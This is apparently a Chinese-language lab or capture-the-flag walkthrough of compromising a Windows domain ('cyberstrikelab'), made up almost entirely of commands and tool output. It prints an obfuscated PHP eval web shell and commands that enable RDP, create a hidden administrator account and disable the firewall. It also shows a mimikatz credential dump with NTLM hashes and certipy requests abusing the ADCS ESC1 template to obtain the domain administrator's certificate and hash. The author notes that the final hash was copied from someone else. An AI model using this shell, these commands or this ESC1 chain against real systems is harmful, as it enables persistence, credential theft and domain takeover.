CMSeasy #
进入80端口,发现CMSeasy服务
<?php
function simpleTransform($str, $offset = 1) {
$transformed = '';
for ($i = 0; $i < strlen($str); $i++) {
$transformed .= chr((ord($str[$i]) + $offset) % 256);
}
return $transformed;
}
$original = $_REQUEST["a"];
$transformed = simpleTransform($original, 3);
function reverseTransform($str, $offset = 1) {
$reversed = '';
for ($i = 0; $i < strlen($str); $i++) {
$reversed .= chr((ord($str[$i]) - $offset + 256) % 256);
}
return $reversed;
}
$reversed = reverseTransform($transformed, 3);
echo eval($reversed);
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable
xfreerdp3 /v:172.5.33.6 /u:hack /p:Admin@123 /cert:ignore
SMB #
直接扫出来了用户凭证
shell mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
User Name : hack
Domain : CYBERWEB
NTLM : 570a9a65db8fba761c1008a51d4c95ab
User Name : CYBERWEB$
Domain : CYBERSTRIKELAB
NTLM : 5e0d5d7bacf2087dfd44ea47812b5165
User Name : CYBERWEB$
Domain : CYBERSTRIKELAB
NTLM : 331dcbb88d1a4847c97eab7c1c168ac8
User Name : cslab
Domain : CYBERSTRIKELAB
NTLM : 39b0e84f13872f51efb3b8ba5018c517
User Name : Administrator
Domain : CYBERWEB
NTLM : c377ba8a4dd52401bc404dbe49771bbc
ADCS #
之前fscan的红色部分提到了ADCS,用certipy检查一下
pc -q certipy-ad find -vuln -u cslab -hashes :39b0e84f13872f51efb3b8ba5018c517 -dc-ip 10.6.6.55 -ns 10.6.6.55 -dns-tcp -debug
结果如下,似乎存在ESC1,ESC8
Certificate Authorities
0
CA Name : cyberstrikelab-DC-CA
DNS Name : DC.cyberstrikelab.com
Certificate Subject : CN=cyberstrikelab-DC-CA, DC=cyberstrikelab, DC=com
Certificate Serial Number : 652A47597C7F03824B7815EBE474E40B
Certificate Validity Start : 2025-04-22 07:45:38+00:00
Certificate Validity End : 2030-04-22 07:55:38+00:00
Web Enrollment : Enabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : CYBERSTRIKELAB.COM\Administrators
Access Rights
ManageCertificates : CYBERSTRIKELAB.COM\Administrators
CYBERSTRIKELAB.COM\Domain Admins
CYBERSTRIKELAB.COM\Enterprise Admins
ManageCa : CYBERSTRIKELAB.COM\Administrators
CYBERSTRIKELAB.COM\Domain Admins
CYBERSTRIKELAB.COM\Enterprise Admins
Enroll : CYBERSTRIKELAB.COM\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates
0
Template Name : DC
Display Name : DC
Certificate Authorities : cyberstrikelab-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : CYBERSTRIKELAB.COM\Domain Users
CYBERSTRIKELAB.COM\Domain Admins
CYBERSTRIKELAB.COM\Domain Computers
CYBERSTRIKELAB.COM\Enterprise Admins
CYBERSTRIKELAB.COM\Authenticated Users
Object Control Permissions
Owner : CYBERSTRIKELAB.COM\Administrator
Write Owner Principals : CYBERSTRIKELAB.COM\Domain Admins
CYBERSTRIKELAB.COM\Enterprise Admins
CYBERSTRIKELAB.COM\Administrator
Write Dacl Principals : CYBERSTRIKELAB.COM\Domain Admins
CYBERSTRIKELAB.COM\Enterprise Admins
CYBERSTRIKELAB.COM\Administrator
Write Property Principals : CYBERSTRIKELAB.COM\Domain Admins
CYBERSTRIKELAB.COM\Enterprise Admins
CYBERSTRIKELAB.COM\Administrator
[!] Vulnerabilities
ESC1 : 'CYBERSTRIKELAB.COM\\Domain Users', 'CYBERSTRIKELAB.COM\\Domain Computers' and 'CYBERSTRIKELAB.COM\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
直接用ESC1吧
[root@Hacking] /home/kali/lab9
❯ pc -q certipy-ad req -username cslab -hashes ':39b0e84f13872f51efb3b8ba5018c517' -dc-ip 10.6.6.55 -target DC.cyberstrikelab.com -ca cyberstrikelab-DC-CA -template DC -upn administrator -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'DC.cyberstrikelab.com' at '10.6.6.55'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:224.0.0.1[\pipe\cert]
[+] Connected to endpoint: ncacn_np:224.0.0.1[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
然后下面这步无法时间同步,直接抄的别人的哈希
certipy auth -pfx administrator.pfx -domain cyberstrike.com -dc-ip 10.6.6.55 -ns 10.6.6.55 -debug -username administrator -domain CYBERSTRIKELAB.COM
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@cyberstrikelab.com
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@cyberstrikelab.com': aad3b435b51404eeaad3b435b51404ee:28cfbc91020438f2a064a63fff9871fa
